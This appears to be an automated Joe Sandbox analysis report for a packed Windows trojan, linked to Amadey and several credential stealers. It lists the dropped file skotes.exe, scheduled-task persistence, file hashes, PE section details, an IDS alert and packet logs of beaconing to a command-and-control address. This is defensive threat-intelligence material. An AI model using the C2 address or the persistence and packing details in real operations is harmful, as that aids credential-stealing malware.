Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
msqT9atzYW.exe	58%	ReversingLabs	Win32.Packed.Generic
msqT9atzYW.exe	52%	Virustotal		Browse
msqT9atzYW.exe	100%	Avira	TR/Crypt.TPM.Gen
msqT9atzYW.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	100%	Avira	TR/Crypt.TPM.Gen
C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	58%	ReversingLabs	Win32.Packed.Generic

Source	Detection	Scanner	Label	Link
http://185.215.113.43/Zu7JuNko/index.php	100%	URL Reputation	phishing
http://185.215.113.43/Zu7JuNko/index.phpj	12%	Virustotal		Browse
http://185.215.113.43/Zu7JuNko/index.phpF	12%	Virustotal		Browse
http://185.215.113.43/Zu7JuNko/index.phpqYo30zpOYVp	12%	Virustotal		Browse

Name	Malicious	Antivirus Detection	Reputation
http://185.215.113.43/Zu7JuNko/index.php	true	URL Reputation: phishing	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://185.215.113.43/Zu7JuNko/index.phpncoded_9	skotes.exe, 00000007.00000002.3479317358.000000000166E000.00000004.00000020.00020000.00000000.sdmp	true		unknown
http://185.215.113.43/Zu7JuNm	skotes.exe, 00000007.00000002.3479317358.0000000001689000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://185.215.113.43/Zu7JuNko/index.phpF	skotes.exe, 00000007.00000002.3479317358.0000000001658000.00000004.00000020.00020000.00000000.sdmp	true	12%, Virustotal, Browse	unknown
http://185.215.113.43/Zu7JuNko/index.phpj	skotes.exe, 00000007.00000002.3479317358.0000000001658000.00000004.00000020.00020000.00000000.sdmp	true	12%, Virustotal, Browse	unknown
http://185.215.113.43/Zu7JuNko/index.phpqYo30zpOYVp	skotes.exe, 00000007.00000002.3479317358.000000000166E000.00000004.00000020.00020000.00000000.sdmp	true	12%, Virustotal, Browse	unknown
http://185.215.113.43/Zu7JuNko/index.phpW	skotes.exe, 00000007.00000002.3479317358.0000000001689000.00000004.00000020.00020000.00000000.sdmp	true		unknown
http://185.215.113.43/Zu7JuNko/index.phpncoded	skotes.exe, 00000007.00000002.3479317358.000000000166E000.00000004.00000020.00020000.00000000.sdmp	true		unknown
http://185.215.113.43/Zu7JuNko/index.php-	skotes.exe, 00000007.00000002.3479317358.000000000166E000.00000004.00000020.00020000.00000000.sdmp	true		unknown
http://185.215.113.43/Zu7JuNko/index.php7n	skotes.exe, 00000007.00000002.3479317358.000000000163F000.00000004.00000020.00020000.00000000.sdmp	true		unknown
http://185.215.113.43/Zu7JuNko/index.phpN	skotes.exe, 00000007.00000002.3479317358.000000000166E000.00000004.00000020.00020000.00000000.sdmp	true		unknown
http://185.215.113.43/Zu7JuNko/index.phpt9	skotes.exe, 00000007.00000002.3479317358.000000000166E000.00000004.00000020.00020000.00000000.sdmp	true		unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
185.215.113.43	unknown	Portugal		206894	WHOLESALECONNECTIONSNL	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1540828
Start date and time:	2024-10-24 08:37:06 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 6m 18s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	9
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	msqT9atzYW.exe renamed because original name is a hash value
Original Sample Name:	b2f874f58722f67061a01726f43ce570.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@5/3@0/1
EGA Information:	Successful, ratio: 25%
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target msqT9atzYW.exe, PID 1880 because it is empty
Execution Graph export aborted for target skotes.exe, PID 424 because there are no executed function
Execution Graph export aborted for target skotes.exe, PID 4788 because there are no executed function
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
02:39:01	API Interceptor	479752x Sleep call for process: skotes.exe modified
08:37:57	Task Scheduler	Run new task: {C9C1DF0D-885C-4768-AFE9-3D0A285496E3} path:
08:38:10	Task Scheduler	Run new task: skotes path: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
185.215.113.43	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	185.215.113.43/Zu7JuNko/index.php
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	185.215.113.43/Zu7JuNko/index.php
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	185.215.113.43/Zu7JuNko/index.php
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	185.215.113.43/Zu7JuNko/index.php
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar	Browse	185.215.113.43/Zu7JuNko/index.php
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	185.215.113.43/Zu7JuNko/index.php
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	185.215.113.43/Zu7JuNko/index.php
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	185.215.113.43/Zu7JuNko/index.php
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	185.215.113.43/Zu7JuNko/index.php
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	185.215.113.43/Zu7JuNko/index.php

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
WHOLESALECONNECTIONSNL	file.exe	Get hash	malicious	LummaC, Stealc	Browse	185.215.113.16
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.37
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	185.215.113.16
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.37
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.37
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	185.215.113.16
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.37
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	185.215.113.16
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.37
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.37

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Download File

Process:	C:\Users\user\Desktop\msqT9atzYW.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1996800
Entropy (8bit):	7.949890737479713
Encrypted:	false
SSDEEP:	49152:NzMZdtSFojAfiO4oC8KIjlrRT132upCb+A860u:NadtiZfiyDNpZB+b+A8z
MD5:	B2F874F58722F67061A01726F43CE570
SHA1:	87572C77EC7D2AE7385F5855B337D2DDB530CB01
SHA-256:	4FEAE1EA40A074D042BA08876D3C459DDDCEFC9D4EAAD6A5A0709DD482E899DF
SHA-512:	E3C955999C2573742E346058A4B3CC4E0F6350EDB2C55BCD83CEF00E6A28902DA787FF47EAE7C556753073E9D985CA706E1E866845881D7C18BD705C6D637782
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 58%
Joe Sandbox View:	Filename: file.exe, Detection: malicious, Browse
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........-I..C...C...C...@...C...F.B.C.6.G...C.6.@...C.6.F...C...G...C...B...C...B.5.C.x.J...C.x.....C.x.A...C.Rich..C.........................PE..L....V.f..............................N...........@.......................... O...........@.................................W...k.............................N.............................T.N..................................................... . ............................@....rsrc...............................@....idata ............................@... ..,.........................@...xwcxlzln.`....3..\..................@...gxotezyq......N......P..............@....taggant.0....N.."...V..............@...................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\msqT9atzYW.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Reputation:	high, very likely benign file
Preview:	[ZoneTransfer]....ZoneId=0

C:\Windows\Tasks\skotes.job

Download File

Process:	C:\Users\user\Desktop\msqT9atzYW.exe
File Type:	data
Category:	dropped
Size (bytes):	302
Entropy (8bit):	3.433641763478608
Encrypted:	false
SSDEEP:	6:Hcq/e/VXUhXUEZ+lX1CGdKUe6tE9+AQy0lXl0ut0:vI4Q1CGAFD9+nVXldt0
MD5:	64AD5777AC04174F5B1E264C4F96A247
SHA1:	84960A8FF6FA602F312C157F9026FF8B9A0A0226
SHA-256:	5D512664DFD661EB3B1DD8D76B78A150A3DF3B8980696BC142881C1A8477F929
SHA-512:	5E95CA4E0299455B5E82A3633ECE5CF3212819BFE6872AA428D77056546A51929645AB0DD5235B99E9A560BD0B82714C9DCFD050F9F0C7D93CE9B0EA5CCC6A95
Malicious:	false
Preview:	.....9..]Z7M..(s..+-F.......<... .....s.......... ....................;.C.:.\.U.s.e.r.s.\.e.n.g.i.n.e.e.r.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.a.b.c.3.b.c.1.9.8.5.\.s.k.o.t.e.s...e.x.e.........E.N.G.I.N.E.E.R.-.P.C.\.e.n.g.i.n.e.e.r...................0.................'.@3P.........................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.949890737479713
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	msqT9atzYW.exe
File size:	1'996'800 bytes
MD5:	b2f874f58722f67061a01726f43ce570
SHA1:	87572c77ec7d2ae7385f5855b337d2ddb530cb01
SHA256:	4feae1ea40a074d042ba08876d3c459dddcefc9d4eaad6a5a0709dd482e899df
SHA512:	e3c955999c2573742e346058a4b3cc4e0f6350edb2c55bcd83cef00e6a28902da787ff47eae7c556753073e9d985ca706e1e866845881d7c18bd705c6d637782
SSDEEP:	49152:NzMZdtSFojAfiO4oC8KIjlrRT132upCb+A860u:NadtiZfiyDNpZB+b+A8z
TLSH:	439533E50A621038C1BFC8F202AF109179573489D0E7D9666998F1A6E4933F997DCFCE
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........-I..C...C...C...@...C...F.B.C.6.G...C.6.@...C.6.F...C...G...C...B...C...B.5.C.x.J...C.x.....C.x.A...C.Rich..C................

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x8ef000
Entrypoint Section:	.taggant
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:	0x66F0569C [Sun Sep 22 17:40:44 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	2eabe9054cad5152567f0699947a2c5b

Entrypoint Preview

Instruction
jmp 00007F43C8D15AAAh
orps xmm3, dqword ptr [esi]
add byte ptr [eax], al
add byte ptr [eax], al
add cl, ch
add byte ptr [eax], ah
add byte ptr [eax], al
add byte ptr [esi], al
or al, byte ptr [eax]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax-40h], ah

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x6a057	0x6b	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x69000	0x1e0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x4edba4	0x10	xwcxlzln
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x4edb54	0x18	xwcxlzln
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
	0x1000	0x68000	0x2de00	0a6dfdc61cffb1bfa58c7731122d1b47	False	0.998414083787466	data	7.987683787433311	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x69000	0x1e0	0x200	b7d16686b376821266a9345c26b7e6d6	False	0.53125	data	4.7176788329467545	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0x6a000	0x1000	0x200	cc76e3822efdc911f469a3e3cc9ce9fe	False	0.1484375	data	1.0428145631430756	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
	0x6b000	0x2cd000	0x200	8ec7d4afdb1f085f124345712957cb39	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
xwcxlzln	0x338000	0x1b6000	0x1b5c00	8ce1debb36541730e7343e6492837a24	False	0.9951746323529411	data	7.954322884658926	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
gxotezyq	0x4ee000	0x1000	0x600	5dea72c464ab3b125755c0cdd78f6eb1	False	0.5657552083333334	data	4.958847647626057	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant	0x4ef000	0x3000	0x2200	77ac6da37f7d6ab5f466eed996f0f45c	False	0.05813419117647059	DOS executable (COM)	0.562069726639672	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_MANIFEST	0x69060	0x17d	XML 1.0 document, ASCII text, with CRLF line terminators	English	United States	0.5931758530183727

Imports

DLL	Import
kernel32.dll	lstrcpy

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-10-24T08:39:45.780497+0200	2856147	ETPRO MALWARE Amadey CnC Activity M3	1	192.168.2.6	49999	185.215.113.43	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 24, 2024 08:39:04.974229097 CEST	49982	80	192.168.2.6	185.215.113.43
Oct 24, 2024 08:39:04.979641914 CEST	80	49982	185.215.113.43	192.168.2.6
Oct 24, 2024 08:39:04.979729891 CEST	49982	80	192.168.2.6	185.215.113.43
Oct 24, 2024 08:39:04.979887962 CEST	49982	80	192.168.2.6	185.215.113.43
Oct 24, 2024 08:39:04.985152006 CEST	80	49982	185.215.113.43	192.168.2.6
Oct 24, 2024 08:39:05.908071995 CEST	80	49982	185.215.113.43	192.168.2.6
Oct 24, 2024 08:39:05.908284903 CEST	49982	80	192.168.2.6	185.215.113.43
Oct 24, 2024 08:39:07.456162930 CEST	49982	80	192.168.2.6	185.215.113.43
Oct 24, 2024 08:39:07.456562042 CEST	49983	80	192.168.2.6	185.215.113.43
Oct 24, 2024 08:39:07.461740971 CEST	80	49982	185.215.113.43	192.168.2.6
Oct 24, 2024 08:39:07.461872101 CEST	80	49983	185.215.113.43	192.168.2.6
Oct 24, 2024 08:39:07.461894035 CEST	49982	80	192.168.2.6	185.215.113.43
Oct 24, 2024 08:39:07.461997986 CEST	49983	80	192.168.2.6	185.215.113.43
Oct 24, 2024 08:39:07.465884924 CEST	49983	80	192.168.2.6	185.215.113.43
Oct 24, 2024 08:39:07.471219063 CEST	80	49983	185.215.113.43	192.168.2.6
Oct 24, 2024 08:39:08.379791975 CEST	80	49983	185.215.113.43	192.168.2.6
Oct 24, 2024 08:39:08.379911900 CEST	49983	80	192.168.2.6	185.215.113.43
Oct 24, 2024 08:39:10.000999928 CEST	49983	80	192.168.2.6	185.215.113.43
Oct 24, 2024 08:39:10.001414061 CEST	49984	80	192.168.2.6	185.215.113.43
Oct 24, 2024 08:39:10.006711960 CEST	80	49984	185.215.113.43	192.168.2.6
Oct 24, 2024 08:39:10.006803989 CEST	49984	80	192.168.2.6	185.215.113.43
Oct 24, 2024 08:39:10.006942034 CEST	80	49983	185.215.113.43	192.168.2.6
Oct 24, 2024 08:39:10.006949902 CEST	49984	80	192.168.2.6	185.215.113.43
Oct 24, 2024 08:39:10.006994963 CEST	49983	80	192.168.2.6	185.215.113.43
Oct 24, 2024 08:39:10.012259007 CEST	80	49984	185.215.113.43	192.168.2.6
Oct 24, 2024 08:39:10.918543100 CEST	80	49984	185.215.113.43	192.168.2.6
Oct 24, 2024 08:39:10.918639898 CEST	49984	80	192.168.2.6	185.215.113.43
Oct 24, 2024 08:39:12.423568964 CEST	49984	80	192.168.2.6	185.215.113.43
Oct 24, 2024 08:39:12.429186106 CEST	80	49984	185.215.113.43	192.168.2.6
Oct 24, 2024 08:39:12.429254055 CEST	49984	80	192.168.2.6	185.215.113.43
Oct 24, 2024 08:39:12.432775974 CEST	49985	80	192.168.2.6	185.215.113.43
Oct 24, 2024 08:39:12.438208103 CEST	80	49985	185.215.113.43	192.168.2.6
Oct 24, 2024 08:39:12.438287973 CEST	49985	80	192.168.2.6	185.215.113.43
Oct 24, 2024 08:39:12.439724922 CEST	49985	80	192.168.2.6	185.215.113.43
Oct 24, 2024 08:39:12.445044041 CEST	80	49985	185.215.113.43	192.168.2.6
Oct 24, 2024 08:39:13.345778942 CEST	80	49985	185.215.113.43	192.168.2.6
Oct 24, 2024 08:39:13.346014023 CEST	49985	80	192.168.2.6	185.215.113.43
Oct 24, 2024 08:39:14.970145941 CEST	49985	80	192.168.2.6	185.215.113.43
Oct 24, 2024 08:39:14.970565081 CEST	49986	80	192.168.2.6	185.215.113.43
Oct 24, 2024 08:39:14.975696087 CEST	80	49985	185.215.113.43	192.168.2.6
Oct 24, 2024 08:39:14.975828886 CEST	49985	80	192.168.2.6	185.215.113.43
Oct 24, 2024 08:39:14.975858927 CEST	80	49986	185.215.113.43	192.168.2.6
Oct 24, 2024 08:39:14.975953102 CEST	49986	80	192.168.2.6	185.215.113.43
Oct 24, 2024 08:39:14.976119995 CEST	49986	80	192.168.2.6	185.215.113.43
Oct 24, 2024 08:39:14.981364012 CEST	80	49986	185.215.113.43	192.168.2.6
Oct 24, 2024 08:39:15.896683931 CEST	80	49986	185.215.113.43	192.168.2.6
Oct 24, 2024 08:39:15.896787882 CEST	49986	80	192.168.2.6	185.215.113.43
Oct 24, 2024 08:39:17.409832954 CEST	49986	80	192.168.2.6	185.215.113.43
Oct 24, 2024 08:39:17.410404921 CEST	49988	80	192.168.2.6	185.215.113.43
Oct 24, 2024 08:39:17.416122913 CEST	80	49986	185.215.113.43	192.168.2.6
Oct 24, 2024 08:39:17.416141987 CEST	80	49988	185.215.113.43	192.168.2.6
Oct 24, 2024 08:39:17.416239977 CEST	49986	80	192.168.2.6	185.215.113.43
Oct 24, 2024 08:39:17.416292906 CEST	49988	80	192.168.2.6	185.215.113.43
Oct 24, 2024 08:39:17.416484118 CEST	49988	80	192.168.2.6	185.215.113.43
Oct 24, 2024 08:39:17.421813011 CEST	80	49988	185.215.113.43	192.168.2.6
Oct 24, 2024 08:39:18.331567049 CEST	80	49988	185.215.113.43	192.168.2.6
Oct 24, 2024 08:39:18.331660986 CEST	49988	80	192.168.2.6	185.215.113.43
Oct 24, 2024 08:39:19.954066992 CEST	49988	80	192.168.2.6	185.215.113.43
Oct 24, 2024 08:39:19.954487085 CEST	49989	80	192.168.2.6	185.215.113.43
Oct 24, 2024 08:39:19.959764957 CEST	80	49988	185.215.113.43	192.168.2.6
Oct 24, 2024 08:39:19.959820032 CEST	80	49989	185.215.113.43	192.168.2.6
Oct 24, 2024 08:39:19.959851027 CEST	49988	80	192.168.2.6	185.215.113.43
Oct 24, 2024 08:39:19.959928036 CEST	49989	80	192.168.2.6	185.215.113.43
Oct 24, 2024 08:39:19.960088015 CEST	49989	80	192.168.2.6	185.215.113.43
Oct 24, 2024 08:39:19.965358973 CEST	80	49989	185.215.113.43	192.168.2.6
Oct 24, 2024 08:39:20.871769905 CEST	80	49989	185.215.113.43	192.168.2.6
Oct 24, 2024 08:39:20.872104883 CEST	49989	80	192.168.2.6	185.215.113.43
Oct 24, 2024 08:39:22.391796112 CEST	49989	80	192.168.2.6	185.215.113.43
Oct 24, 2024 08:39:22.392211914 CEST	49990	80	192.168.2.6	185.215.113.43
Oct 24, 2024 08:39:22.397667885 CEST	80	49990	185.215.113.43	192.168.2.6
Oct 24, 2024 08:39:22.397759914 CEST	49990	80	192.168.2.6	185.215.113.43
Oct 24, 2024 08:39:22.397782087 CEST	80	49989	185.215.113.43	192.168.2.6
Oct 24, 2024 08:39:22.397835970 CEST	49989	80	192.168.2.6	185.215.113.43
Oct 24, 2024 08:39:22.398008108 CEST	49990	80	192.168.2.6	185.215.113.43
Oct 24, 2024 08:39:22.403302908 CEST	80	49990	185.215.113.43	192.168.2.6
Oct 24, 2024 08:39:23.319698095 CEST	80	49990	185.215.113.43	192.168.2.6
Oct 24, 2024 08:39:23.319765091 CEST	49990	80	192.168.2.6	185.215.113.43
Oct 24, 2024 08:39:24.938525915 CEST	49990	80	192.168.2.6	185.215.113.43
Oct 24, 2024 08:39:24.939012051 CEST	49991	80	192.168.2.6	185.215.113.43
Oct 24, 2024 08:39:24.944127083 CEST	80	49990	185.215.113.43	192.168.2.6
Oct 24, 2024 08:39:24.944204092 CEST	49990	80	192.168.2.6	185.215.113.43
Oct 24, 2024 08:39:24.944341898 CEST	80	49991	185.215.113.43	192.168.2.6
Oct 24, 2024 08:39:24.944504976 CEST	49991	80	192.168.2.6	185.215.113.43
Oct 24, 2024 08:39:24.944549084 CEST	49991	80	192.168.2.6	185.215.113.43
Oct 24, 2024 08:39:24.949868917 CEST	80	49991	185.215.113.43	192.168.2.6
Oct 24, 2024 08:39:25.855693102 CEST	80	49991	185.215.113.43	192.168.2.6
Oct 24, 2024 08:39:25.855886936 CEST	49991	80	192.168.2.6	185.215.113.43
Oct 24, 2024 08:39:27.362656116 CEST	49991	80	192.168.2.6	185.215.113.43
Oct 24, 2024 08:39:27.362859011 CEST	49992	80	192.168.2.6	185.215.113.43
Oct 24, 2024 08:39:27.368315935 CEST	80	49992	185.215.113.43	192.168.2.6
Oct 24, 2024 08:39:27.368335009 CEST	80	49991	185.215.113.43	192.168.2.6
Oct 24, 2024 08:39:27.368448973 CEST	49991	80	192.168.2.6	185.215.113.43
Oct 24, 2024 08:39:27.368443012 CEST	49992	80	192.168.2.6	185.215.113.43
Oct 24, 2024 08:39:27.368746996 CEST	49992	80	192.168.2.6	185.215.113.43
Oct 24, 2024 08:39:27.374082088 CEST	80	49992	185.215.113.43	192.168.2.6
Oct 24, 2024 08:39:28.274848938 CEST	80	49992	185.215.113.43	192.168.2.6
Oct 24, 2024 08:39:28.275024891 CEST	49992	80	192.168.2.6	185.215.113.43
Oct 24, 2024 08:39:29.899338007 CEST	49992	80	192.168.2.6	185.215.113.43
Oct 24, 2024 08:39:29.899786949 CEST	49993	80	192.168.2.6	185.215.113.43
Oct 24, 2024 08:39:29.905594110 CEST	80	49992	185.215.113.43	192.168.2.6
Oct 24, 2024 08:39:29.905608892 CEST	80	49993	185.215.113.43	192.168.2.6
Oct 24, 2024 08:39:29.905664921 CEST	49992	80	192.168.2.6	185.215.113.43
Oct 24, 2024 08:39:29.905740023 CEST	49993	80	192.168.2.6	185.215.113.43
Oct 24, 2024 08:39:29.905942917 CEST	49993	80	192.168.2.6	185.215.113.43
Oct 24, 2024 08:39:29.911329031 CEST	80	49993	185.215.113.43	192.168.2.6
Oct 24, 2024 08:39:30.812454939 CEST	80	49993	185.215.113.43	192.168.2.6
Oct 24, 2024 08:39:30.812685013 CEST	49993	80	192.168.2.6	185.215.113.43
Oct 24, 2024 08:39:32.329468012 CEST	49993	80	192.168.2.6	185.215.113.43
Oct 24, 2024 08:39:32.330064058 CEST	49994	80	192.168.2.6	185.215.113.43
Oct 24, 2024 08:39:32.335422993 CEST	80	49993	185.215.113.43	192.168.2.6
Oct 24, 2024 08:39:32.335510969 CEST	49993	80	192.168.2.6	185.215.113.43
Oct 24, 2024 08:39:32.335542917 CEST	80	49994	185.215.113.43	192.168.2.6
Oct 24, 2024 08:39:32.335648060 CEST	49994	80	192.168.2.6	185.215.113.43
Oct 24, 2024 08:39:32.335817099 CEST	49994	80	192.168.2.6	185.215.113.43
Oct 24, 2024 08:39:32.341137886 CEST	80	49994	185.215.113.43	192.168.2.6
Oct 24, 2024 08:39:33.251482010 CEST	80	49994	185.215.113.43	192.168.2.6
Oct 24, 2024 08:39:33.251697063 CEST	49994	80	192.168.2.6	185.215.113.43
Oct 24, 2024 08:39:34.876401901 CEST	49994	80	192.168.2.6	185.215.113.43
Oct 24, 2024 08:39:34.876832008 CEST	49995	80	192.168.2.6	185.215.113.43
Oct 24, 2024 08:39:34.882020950 CEST	80	49994	185.215.113.43	192.168.2.6
Oct 24, 2024 08:39:34.882154942 CEST	80	49995	185.215.113.43	192.168.2.6
Oct 24, 2024 08:39:34.882251024 CEST	49994	80	192.168.2.6	185.215.113.43
Oct 24, 2024 08:39:34.882297039 CEST	49995	80	192.168.2.6	185.215.113.43
Oct 24, 2024 08:39:34.882500887 CEST	49995	80	192.168.2.6	185.215.113.43
Oct 24, 2024 08:39:34.887782097 CEST	80	49995	185.215.113.43	192.168.2.6
Oct 24, 2024 08:39:35.783488035 CEST	80	49995	185.215.113.43	192.168.2.6
Oct 24, 2024 08:39:35.783555031 CEST	49995	80	192.168.2.6	185.215.113.43
Oct 24, 2024 08:39:37.298028946 CEST	49995	80	192.168.2.6	185.215.113.43
Oct 24, 2024 08:39:37.298484087 CEST	49996	80	192.168.2.6	185.215.113.43
Oct 24, 2024 08:39:37.368825912 CEST	80	49996	185.215.113.43	192.168.2.6
Oct 24, 2024 08:39:37.368880987 CEST	80	49995	185.215.113.43	192.168.2.6
